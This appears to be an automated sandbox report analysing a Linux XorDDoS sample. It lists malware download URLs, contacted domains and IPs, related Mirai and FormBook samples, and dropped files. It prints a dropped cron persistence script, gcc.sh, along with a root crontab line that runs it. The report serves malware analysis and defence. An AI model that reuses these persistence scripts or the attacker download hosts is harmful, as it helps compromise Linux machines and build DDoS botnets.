http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nx	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9vl	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9va	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bj	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ez	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wx	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ef	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ss	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cc	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cp	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gg	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lk	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bh	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ppp.gggatat456.com	142.4.106.74	true	false		unknown
p5.lpjulidny7.com	34.98.99.30	true	false		unknown
www1.gggatat456.com	142.0.138.41	true	true		unknown
ppp.xxxatat456.com	192.74.236.35	true	false		unknown
p5.dddgata789.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gv	1.elf, 6542.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6545.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct	1.elf, 6505.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6508.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6510.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6513.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6516.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9vl	1.elf, 6436.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6439.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6441.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6444.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6447.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9dy	1.elf, 6274.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6277.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6279.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6282.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6285.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ez	1.elf, 6257.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6260.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6263.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6265.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6268.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bj	1.elf, 6419.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6422.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6424.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6427.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6430.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gnu.org/software/libc/bugs.html	1.elf, vlteqhfomz.11.dr, lkzqkklpfr.11.dr, vapcvdizxx.11.dr, wxysocrflf.11.dr, uaewjndswe.11.dr, libudev.so.11.dr, efgdvbpuxx.11.dr, nxattrsdxm.11.dr, dyuvutukki.11.dr, ezztyrfjzf.11.dr, bjhrrojebv.11.dr, ccxfvtbhgr.11.dr, ssrfvzfvpk.11.dr, cpbnjarskl.11.dr	false		high
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nx	1.elf, 6402.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6405.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6408.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6411.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6414.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ua	1.elf, 6363.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6366.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6368.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6371.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6374.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9va	1.elf, 6312.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6315.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6317.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6320.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6323.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cp	1.elf, 6346.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6349.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6351.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6354.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6357.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cc	1.elf, 6238.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6241.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6244.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6246.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6249.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gg	1.elf, 6524.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6527.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6529.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6533.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6535.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ss	1.elf, 6470.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6473.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6475.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6478.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6482.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lk	1.elf, 6329.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6332.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6335.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6337.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6340.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ef	1.elf, 6382.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6385.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6388.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6390.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6393.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wx	1.elf, 6453.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6456.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6458.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6461.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6464.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bh	1.elf, 6488.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6491.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6494.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6496.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6499.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	1.elf, 6204.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6206.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6207.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6208.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.74.236.35	ppp.xxxatat456.com	United States		54600	PEGTECHINCUS	false
142.4.106.74	ppp.gggatat456.com	United States		54600	PEGTECHINCUS	false
142.0.138.44	unknown	United States		54600	PEGTECHINCUS	true
142.0.138.41	www1.gggatat456.com	United States		54600	PEGTECHINCUS	true
34.98.99.30	p5.lpjulidny7.com	United States		15169	GOOGLEUS	false
109.202.202.202	unknown	Switzerland		13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom		41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom		41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	AGUpU2AUqL.elf	Get hash	malicious	Mirai	Browse
	phantom.arm7.elf	Get hash	malicious	Unknown	Browse
	Josho.arm5.elf	Get hash	malicious	Unknown	Browse
	qO3Aq40KCB.elf	Get hash	malicious	Mirai, Moobot	Browse
	pi5zwdO9u3.elf	Get hash	malicious	Mirai, Moobot	Browse
	x86.n.elf	Get hash	malicious	Mirai, Moobot	Browse
	x8.n.elf	Get hash	malicious	Mirai, Moobot	Browse
	RqjCqeOaWF.elf	Get hash	malicious	Mirai	Browse
	UHx7w4YliZ.elf	Get hash	malicious	Mirai	Browse
	2U85a2FpDJ.elf	Get hash	malicious	Mirai	Browse
	NYzt5Ms8RU.elf	Get hash	malicious	Mirai	Browse
	X19ScaRqDU.elf	Get hash	malicious	Unknown	Browse
	7qnWvWY2wV.elf	Get hash	malicious	Unknown	Browse
	FzpdcKlWfd.elf	Get hash	malicious	Gafgyt	Browse
	sora.arm7.elf	Get hash	malicious	Mirai	Browse
	KG0KrlsQOu.elf	Get hash	malicious	Unknown	Browse
	2ZVHXp1ghj.elf	Get hash	malicious	Unknown	Browse
	itsoeasy.elf	Get hash	malicious	ItsSoEasy	Browse
	dp6sySM2Qm.elf	Get hash	malicious	Mirai	Browse
	Aqua.x86.elf	Get hash	malicious	Unknown	Browse
91.189.91.43	AGUpU2AUqL.elf	Get hash	malicious	Mirai	Browse
	phantom.arm7.elf	Get hash	malicious	Unknown	Browse
	Josho.arm5.elf	Get hash	malicious	Unknown	Browse
	qO3Aq40KCB.elf	Get hash	malicious	Mirai, Moobot	Browse
	pi5zwdO9u3.elf	Get hash	malicious	Mirai, Moobot	Browse
	x86.n.elf	Get hash	malicious	Mirai, Moobot	Browse
	x8.n.elf	Get hash	malicious	Mirai, Moobot	Browse
	RqjCqeOaWF.elf	Get hash	malicious	Mirai	Browse
	UHx7w4YliZ.elf	Get hash	malicious	Mirai	Browse
	2U85a2FpDJ.elf	Get hash	malicious	Mirai	Browse
	NYzt5Ms8RU.elf	Get hash	malicious	Mirai	Browse
	X19ScaRqDU.elf	Get hash	malicious	Unknown	Browse
	7qnWvWY2wV.elf	Get hash	malicious	Unknown	Browse
	FzpdcKlWfd.elf	Get hash	malicious	Gafgyt	Browse
	sora.arm7.elf	Get hash	malicious	Mirai	Browse
	KG0KrlsQOu.elf	Get hash	malicious	Unknown	Browse
	2ZVHXp1ghj.elf	Get hash	malicious	Unknown	Browse
	itsoeasy.elf	Get hash	malicious	ItsSoEasy	Browse
	dp6sySM2Qm.elf	Get hash	malicious	Mirai	Browse
	Aqua.x86.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	AGUpU2AUqL.elf	Get hash	malicious	Mirai	Browse
	phantom.arm7.elf	Get hash	malicious	Unknown	Browse
	Josho.arm5.elf	Get hash	malicious	Unknown	Browse
	qO3Aq40KCB.elf	Get hash	malicious	Mirai, Moobot	Browse
	pi5zwdO9u3.elf	Get hash	malicious	Mirai, Moobot	Browse
	x86.n.elf	Get hash	malicious	Mirai, Moobot	Browse
	x8.n.elf	Get hash	malicious	Mirai, Moobot	Browse
	RqjCqeOaWF.elf	Get hash	malicious	Mirai	Browse
	UHx7w4YliZ.elf	Get hash	malicious	Mirai	Browse
	2U85a2FpDJ.elf	Get hash	malicious	Mirai	Browse
	NYzt5Ms8RU.elf	Get hash	malicious	Mirai	Browse
	X19ScaRqDU.elf	Get hash	malicious	Unknown	Browse
	7qnWvWY2wV.elf	Get hash	malicious	Unknown	Browse
	FzpdcKlWfd.elf	Get hash	malicious	Gafgyt	Browse
	sora.arm7.elf	Get hash	malicious	Mirai	Browse
	KG0KrlsQOu.elf	Get hash	malicious	Unknown	Browse
	2ZVHXp1ghj.elf	Get hash	malicious	Unknown	Browse
	itsoeasy.elf	Get hash	malicious	ItsSoEasy	Browse
	dp6sySM2Qm.elf	Get hash	malicious	Mirai	Browse
	Aqua.x86.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ppp.xxxatat456.com	dkuidbsedp	Get hash	malicious	XorDDoS	Browse	46.105.84.190
	libudev.so	Get hash	malicious	XorDDoS	Browse	54.36.15.96
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse	79.137.1.132
	libudev.so	Get hash	malicious		Browse	151.80.176.165
ppp.gggatat456.com	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse	54.36.145.106
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse	79.137.1.133
	xor1.o	Get hash	malicious	XorDDoS	Browse	176.31.91.137
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse	54.36.145.106
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse	54.36.15.99
	CD2uXlYGfa	Get hash	malicious	XorDDoS	Browse	51.68.183.111
	7ZDbt9EUgm	Get hash	malicious	XorDDoS	Browse	51.89.70.85
	ygljglkjgfg0	Get hash	malicious	XorDDoS	Browse	51.89.52.13
www1.gggatat456.com	dkuidbsedp	Get hash	malicious	XorDDoS	Browse	54.36.15.99
	libudev.so	Get hash	malicious	XorDDoS	Browse	54.36.15.99
	xor1.o	Get hash	malicious	XorDDoS	Browse	54.36.15.99
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse	54.36.15.99
	http://www1.gggatat456.com/dd.rar	Get hash	malicious	Unknown	Browse	51.68.183.108
	w.txt	Get hash	malicious		Browse	92.222.83.172
	w.txt	Get hash	malicious		Browse	92.222.83.172
	1433.bin	Get hash	malicious		Browse	91.134.134.116
	libudev.so	Get hash	malicious		Browse	91.134.134.116

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PEGTECHINCUS	#U00f6deme_talimat#U0131.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	154.84.242.243
	arm7.elf	Get hash	malicious	Mirai	Browse	156.247.76.124
	sOmYWENS1I.elf	Get hash	malicious	Mirai	Browse	107.149.44.149
	m7MeI7tiks.elf	Get hash	malicious	Mirai	Browse	156.247.76.128
	https://www.smbc.acctenet.info/	Get hash	malicious	Unknown	Browse	108.186.251.186
	7c912KO5XC.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	Overdue_payment_settled.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	Orden_de_compra.exe	Get hash	malicious	FormBook	Browse	108.186.24.219
	Hgh7WMRLzKPX09P.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	hesaphareketi-01.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	doc_20232407993001901.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	142.4.119.230
	EOQvIhNLzI.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	9OXb5VhqNL.exe	Get hash	malicious	FormBook, NSISDropper	Browse	154.195.80.66
	skid.x86-20231016-0000.elf	Get hash	malicious	Unknown	Browse	156.243.156.240
	Vs8pIMtfLG.elf	Get hash	malicious	Mirai	Browse	154.195.146.206
	f46hRyQrrk.elf	Get hash	malicious	Mirai	Browse	156.243.156.251
	Ap4oD0Iqq6.elf	Get hash	malicious	Mirai	Browse	156.247.76.145
	EhcEpjpjad.elf	Get hash	malicious	Unknown	Browse	156.243.156.232
PEGTECHINCUS	#U00f6deme_talimat#U0131.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	154.84.242.243
	arm7.elf	Get hash	malicious	Mirai	Browse	156.247.76.124
	sOmYWENS1I.elf	Get hash	malicious	Mirai	Browse	107.149.44.149
	m7MeI7tiks.elf	Get hash	malicious	Mirai	Browse	156.247.76.128
	https://www.smbc.acctenet.info/	Get hash	malicious	Unknown	Browse	108.186.251.186
	7c912KO5XC.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	Overdue_payment_settled.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	Orden_de_compra.exe	Get hash	malicious	FormBook	Browse	108.186.24.219
	Hgh7WMRLzKPX09P.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	hesaphareketi-01.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	doc_20232407993001901.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	142.4.119.230
	EOQvIhNLzI.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	9OXb5VhqNL.exe	Get hash	malicious	FormBook, NSISDropper	Browse	154.195.80.66
	skid.x86-20231016-0000.elf	Get hash	malicious	Unknown	Browse	156.243.156.240
	Vs8pIMtfLG.elf	Get hash	malicious	Mirai	Browse	154.195.146.206
	f46hRyQrrk.elf	Get hash	malicious	Mirai	Browse	156.243.156.251
	Ap4oD0Iqq6.elf	Get hash	malicious	Mirai	Browse	156.247.76.145
	EhcEpjpjad.elf	Get hash	malicious	Unknown	Browse	156.243.156.232
PEGTECHINCUS	#U00f6deme_talimat#U0131.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	154.84.242.243
	arm7.elf	Get hash	malicious	Mirai	Browse	156.247.76.124
	sOmYWENS1I.elf	Get hash	malicious	Mirai	Browse	107.149.44.149
	m7MeI7tiks.elf	Get hash	malicious	Mirai	Browse	156.247.76.128
	https://www.smbc.acctenet.info/	Get hash	malicious	Unknown	Browse	108.186.251.186
	7c912KO5XC.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	Overdue_payment_settled.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	Orden_de_compra.exe	Get hash	malicious	FormBook	Browse	108.186.24.219
	Hgh7WMRLzKPX09P.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	hesaphareketi-01.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	doc_20232407993001901.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	142.4.119.230
	EOQvIhNLzI.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	9OXb5VhqNL.exe	Get hash	malicious	FormBook, NSISDropper	Browse	154.195.80.66
	skid.x86-20231016-0000.elf	Get hash	malicious	Unknown	Browse	156.243.156.240
	Vs8pIMtfLG.elf	Get hash	malicious	Mirai	Browse	154.195.146.206
	f46hRyQrrk.elf	Get hash	malicious	Mirai	Browse	156.243.156.251
	Ap4oD0Iqq6.elf	Get hash	malicious	Mirai	Browse	156.247.76.145
	EhcEpjpjad.elf	Get hash	malicious	Unknown	Browse	156.243.156.232

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
/etc/cron.hourly/gcc.sh	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	xor1.o	Get hash	malicious	XorDDoS	Browse
	CCCxor.o	Get hash	malicious	XorDDoS	Browse
	2BAFxor.o	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse
	x.o	Get hash	malicious	XorDDoS	Browse
	23	Get hash	malicious	XorDDoS	Browse
	23	Get hash	malicious	XorDDoS	Browse
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse
	EgrT0zBhDa	Get hash	malicious	XorDDoS	Browse
	4ljhdTTyiA	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Process:	/tmp/1.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28%
Joe Sandbox View:	Filename: iJl2Sb6qRa, Detection: malicious, Browse Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse Filename: CCCxor.o, Detection: malicious, Browse Filename: 2BAFxor.o, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: 0Xorddos.o, Detection: malicious, Browse Filename: x.o, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: XZFWLZVF1Z, Detection: malicious, Browse Filename: EgrT0zBhDa, Detection: malicious, Browse Filename: 4ljhdTTyiA, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/1.elf

Process:	/tmp/1.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.196016600827097
Encrypted:	false
